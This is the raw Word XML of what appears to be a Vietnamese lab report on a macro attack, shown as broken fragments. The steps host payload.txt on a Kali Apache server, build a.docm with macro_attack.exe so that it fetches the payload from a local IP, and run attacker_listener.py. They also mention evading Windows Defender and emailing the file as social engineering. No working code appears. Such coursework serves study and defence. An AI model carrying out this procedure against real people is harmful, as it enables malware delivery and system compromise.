          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>sử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>dụng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 ở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là server apach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Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C3B511" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B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Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C05FC62" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B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Copy file payload.txt sang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Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFFFB6" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B29">
      <w:pPr>
        <w:ind w:left="717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2F2176D6" wp14:editId="31D8AFF5">
            <wp:extent cx="4922520" cy="55213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234" b="16989"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5513278" cy="61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C739" w14:textId="77777777" w:rsidR="005924B6" w:rsidRPr="005924B6" w:rsidRDefault="005924B6" w:rsidP="00A72B29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24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24B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.11. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005924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9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9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92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yload.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="0059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24B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3474DB4E" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B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Copy file payload.txt sang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/var/www/html/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hare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="020E1415" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B29">
      <w:pPr>
        <w:ind w:left="717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0E31707" wp14:editId="02F75D42">
            <wp:extent cx="4404360" cy="49038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4642" cy="5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2DD0" w14:textId="77777777" w:rsidR="005924B6" w:rsidRPr="00A72B29" w:rsidRDefault="005924B6" w:rsidP="00A72B29">
      <w:pPr>
        <w:ind w:left="717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2.3.12 Copy payload.txt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/var/www/html/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hare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A5B69A5" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00A72B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apache2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ên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FF0AAB1" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRDefault="00A72B29" w:rsidP="00EB6178">
      <w:pPr>
        <w:ind w:left="717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6C16E2A" wp14:editId="25AC1C26">
            <wp:extent cx="2943225" cy="428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3AA5" w14:textId="77777777" w:rsidR="005924B6" w:rsidRDefault="005924B6" w:rsidP="00EB6178">
      <w:pPr>
        <w:ind w:left="717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2.3.13.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apache2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Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC38676" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRPr="00A72B29" w:rsidRDefault="00A72B29" w:rsidP="00EB6178">
      <w:pPr>
        <w:ind w:left="717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A72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Kiểm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 tra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>quả</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bằng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cách</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>truy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cập</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A72B29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r w:rsidR="00EB61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72B29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070A3164" w14:textId="77777777" w:rsidR="00A72B29" w:rsidRDefault="00EB6178" w:rsidP="00EB6178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56C0B4F2" wp14:editId="39EA8B45">
            <wp:extent cx="3344740" cy="20955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7845" cy="21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789C" w14:textId="77777777" w:rsidR="005924B6" w:rsidRPr="005924B6" w:rsidRDefault="005924B6" w:rsidP="00EB617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24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24B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.14. Trang web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005924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B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924B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC0C3C0" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRPr="00A72B29" w:rsidRDefault="00EB6178" w:rsidP="00EB617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5924B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file payload.txt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erver apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2276BE" w14:textId="77777777" w:rsidR="00802F4E" w:rsidRDefault="00802F4E" w:rsidP="002571BF">
      <w:pPr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docm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E321045" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRDefault="00EB6178" w:rsidP="00EB61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a.docm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cro_Attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71A6F836" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRDefault="00EB6178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DAA5C" wp14:editId="39AD7286">
            <wp:extent cx="5349240" cy="116414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7035" cy="11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24F5" w14:textId="77777777" w:rsidR="005924B6" w:rsidRDefault="005924B6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15. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F5C8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6F5C86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6F5C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>docm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F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C86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1ACF8FDE" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRDefault="00EB6178" w:rsidP="00EB61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ol macro_attack.ex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ole:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEE85B" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRDefault="00EB6178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F561F" wp14:editId="3D67BC21">
            <wp:extent cx="5349240" cy="217913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803" cy="21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115" w14:textId="77777777" w:rsidR="006F5C86" w:rsidRDefault="006F5C86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16.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_attack.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77947B0B" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRDefault="00EB6178" w:rsidP="00EB61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6178">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nhập</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB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17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B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17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EB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17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B617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EB6178">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>docm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB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17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6178">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a.docm, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB617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B6178">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB617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6178">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB617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EB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17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6178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8C14E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://192.168.0.118/share/payload.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16413BBA" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRDefault="00EB6178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901CC" wp14:editId="21B6D7B6">
            <wp:extent cx="5349240" cy="2191131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9653" cy="21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033E" w14:textId="77777777" w:rsidR="006F5C86" w:rsidRDefault="006F5C86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17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_attack.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259255F7" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRDefault="00EB6178" w:rsidP="00EB61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7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mac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docm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79F8A28B" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRDefault="00EB6178" w:rsidP="00EB61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a.docm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1278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71278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12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78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12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78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712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78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12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78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1278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71278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12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78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1278E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> macro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5280A914" w14:textId="77777777" w:rsidR="00CC7DD8" w:rsidRDefault="0071278E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7E2A78" wp14:editId="49303721">
            <wp:extent cx="5349240" cy="10532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5351" cy="10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4466" w14:textId="77777777" w:rsidR="006F5C86" w:rsidRDefault="006F5C86" w:rsidP="005924B6">
      <w:pPr>
        <w:ind w:left="7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18.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doc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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C3D89E" w14:textId="77777777" w:rsidR="00EB6178" w:rsidRPr="00EB6178" w:rsidRDefault="00CC7DD8" w:rsidP="00CC7DD8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 bypass Windows Defender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6559FDE3" w14:textId="77777777" w:rsidR="00FC52CE" w:rsidRPr="006F5C86" w:rsidRDefault="002571BF" w:rsidP="00FC52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C86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6F5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C86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6F5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C86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Pr="006F5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C8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6F5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C86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6F5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C86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6F5C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file word </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F5C86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6F5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C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="486DDB29" w14:textId="77777777" w:rsidR="00855096" w:rsidRDefault="00FC52CE" w:rsidP="00FC52CE">
      <w:pPr>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC52CE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social engineering.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 email,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2C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C52CE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9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55096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397D8ABD" w14:textId="77777777" w:rsidR="00855096" w:rsidRDefault="00855096" w:rsidP="00FC52CE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0403C25" w14:textId="77777777" w:rsidR="00855096" w:rsidRDefault="00A551ED" w:rsidP="00855096">
      <w:pPr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FB871" wp14:editId="2B139D85">
            <wp:extent cx="3185160" cy="42763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4053" cy="42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15DB" w14:textId="77777777" w:rsidR="006F5C86" w:rsidRPr="006F5C86" w:rsidRDefault="006F5C86" w:rsidP="00855096">
      <w:pPr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5C86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6F5C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.4.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F5C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5C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Quy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F5C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5C86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6F5C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5C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F5C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5C86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Pr="006F5C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file word </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F5C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>độc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F5C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5C86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A63582A" w14:textId="77777777" w:rsidR="00855096" w:rsidRDefault="00855096" w:rsidP="00855096">
      <w:pPr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3A026C" w14:textId="77777777" w:rsidR="00855096" w:rsidRDefault="00855096" w:rsidP="00855096">
      <w:pPr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7BC7CC" w14:textId="77777777" w:rsidR="00855096" w:rsidRDefault="00855096" w:rsidP="00855096">
      <w:pPr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,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sh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mạo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C2AD3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03AC996E" w14:textId="77777777" w:rsidR="00FC2AD3" w:rsidRDefault="00FC2AD3" w:rsidP="00FC2A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2AD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file a.docm ra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6CCE8" w14:textId="77777777" w:rsidR="00FC2AD3" w:rsidRDefault="00FC2AD3" w:rsidP="005924B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EC252" wp14:editId="41C196CF">
            <wp:extent cx="5501640" cy="309467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8775" cy="30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9FBF" w14:textId="77777777" w:rsidR="006F5C86" w:rsidRPr="00FC2AD3" w:rsidRDefault="006F5C86" w:rsidP="005924B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</w:p>
    <w:p w14:paraId="72503674" w14:textId="77777777" w:rsidR="00FC2AD3" w:rsidRDefault="00FC2AD3" w:rsidP="00FC2A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FC2AD3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A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C2AD3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2022”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A45F8B4" w14:textId="77777777" w:rsidR="00FC2AD3" w:rsidRDefault="00FC2AD3" w:rsidP="005924B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366EE" wp14:editId="7550893B">
            <wp:extent cx="5501640" cy="1123252"/>
            <wp:effectExtent l="0" t="0" r="381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3958" cy="11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CEE8" w14:textId="77777777" w:rsidR="006F5C86" w:rsidRDefault="006F5C86" w:rsidP="005924B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3.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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA878FE" w14:textId="77777777" w:rsidR="00FC2AD3" w:rsidRDefault="00FC2AD3" w:rsidP="006C4EF0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67287" w14:textId="77777777" w:rsidR="00A551ED" w:rsidRDefault="00A551ED" w:rsidP="00FC2AD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virus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virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D47F1C" w14:textId="77777777" w:rsidR="00A551ED" w:rsidRDefault="00A551ED" w:rsidP="006C4EF0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0A1D1564" w14:textId="77777777" w:rsidR="00A551ED" w:rsidRPr="00CA5C59" w:rsidRDefault="00A551ED" w:rsidP="00A5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C59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Kali Linux</w:t>
      </w:r>
      <w:r w:rsidR="00CA5C59"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 w:rsidRPr="00CA5C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A5C59"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A5C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacker_listener.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA43FE" w14:textId="77777777" w:rsidR="00A551ED" w:rsidRDefault="00CA5C59" w:rsidP="00CA5C5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A5C5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v</w:t>
      </w:r>
      <w:r w:rsidR="00A551ED" w:rsidRPr="00CA5C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A551ED"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attacker_listener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5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A5C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A551ED" w:rsidRPr="00CA5C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A551ED" w:rsidRPr="00CA5C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551ED" w:rsidRPr="00CA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1ED" w:rsidRPr="00CA5C5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A551ED" w:rsidRPr="00CA5C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file attacker_listener.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A551ED" w:rsidRPr="00CA5C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bằn</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5C59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A551ED" w:rsidRPr="00CA5C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229F36A0" w14:textId="77777777" w:rsidR="00CA5C59" w:rsidRDefault="00CA5C59" w:rsidP="005924B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AD954B" wp14:editId="774537A2">
            <wp:extent cx="5524500" cy="1371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5950" w14:textId="77777777" w:rsidR="006F5C86" w:rsidRDefault="006F5C86" w:rsidP="005924B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ol attacker_listener.p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</w:p>
    <w:p w14:paraId="6F122CF3" w14:textId="77777777" w:rsidR="00CA5C59" w:rsidRDefault="00CA5C59" w:rsidP="00CA5C5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Kali Linux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534CC8" w14:textId="77777777" w:rsidR="00CA5C59" w:rsidRDefault="00CA5C59" w:rsidP="006C4EF0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41B55AB7" w14:textId="77777777" w:rsidR="00CA5C59" w:rsidRDefault="00CA5C59" w:rsidP="00CA5C5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565F1F3" w14:textId="77777777" w:rsidR="00CA5C59" w:rsidRDefault="00CA5C59" w:rsidP="00CA5C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FFDE75" w14:textId="77777777" w:rsidR="00CA5C59" w:rsidRDefault="00CA5C59" w:rsidP="005924B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743671" wp14:editId="465958CE">
            <wp:extent cx="5524500" cy="77555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6843" cy="7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8C" w14:textId="77777777" w:rsidR="006F5C86" w:rsidRDefault="006F5C86" w:rsidP="005924B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666A83F7" w14:textId="77777777" w:rsidR="006F5C86" w:rsidRPr="006F5C86" w:rsidRDefault="006F5C86" w:rsidP="006F5C8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 Defe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55855B" w14:textId="77777777" w:rsidR="00CA5C59" w:rsidRDefault="00CA5C59" w:rsidP="00CA5C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2EE9B9BE" w14:textId="77777777" w:rsidR="00CA5C59" w:rsidRDefault="00555704" w:rsidP="005924B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B0A2D0" wp14:editId="4F62E672">
            <wp:extent cx="5334000" cy="3000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9708" cy="30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8504" w14:textId="77777777" w:rsidR="002B0108" w:rsidRDefault="002B0108" w:rsidP="005924B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6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</w:p>
    <w:p w14:paraId="0506BFE0" w14:textId="77777777" w:rsidR="00555704" w:rsidRPr="00CA5C59" w:rsidRDefault="00555704" w:rsidP="00CA5C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s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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFBAA8C" w14:textId="77777777" w:rsidR="00CA5C59" w:rsidRDefault="00CA5C59" w:rsidP="00CA5C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 </w:t>
      </w:r>
      <w:r w:rsidR="00555704">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Content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ra file payload.exe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docm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55704">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CAA336" w14:textId="6FCF992D" w:rsidR="00555704" w:rsidRDefault="00E4136C" w:rsidP="005924B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413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44B3D" wp14:editId="130CDDDB">
            <wp:extent cx="5943600" cy="4927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D40" w14:textId="77777777" w:rsidR="006C4EF0" w:rsidRDefault="002B0108" w:rsidP="006C4EF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7. File pay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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A8D9E7" w14:textId="77777777" w:rsidR="00555704" w:rsidRDefault="00555704" w:rsidP="006C4EF0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6C4EF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6C4EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">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FBC2ABE" w14:textId="77777777" w:rsidR="00555704" w:rsidRDefault="00555704" w:rsidP="00555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ss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0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1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0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91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0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91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06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C91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0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91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0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91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0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91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0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91906">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C07ADE" w14:textId="77777777" w:rsidR="00C91906" w:rsidRPr="00555704" w:rsidRDefault="00C91906" w:rsidP="00555704">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433640D5" w14:textId="77777777" w:rsidR="00555704" w:rsidRPr="00555704" w:rsidRDefault="00555704" w:rsidP="0055570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3620F56" w14:textId="77777777" w:rsidR="00855096" w:rsidRPr="00CA5C59" w:rsidRDefault="00855096" w:rsidP="00FC52CE">
      <w:pPr>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="33F3158F" w14:textId="77777777" w:rsidR="00FC52CE" w:rsidRPr="00CA5C59" w:rsidRDefault="00FC52CE" w:rsidP="00FC52CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
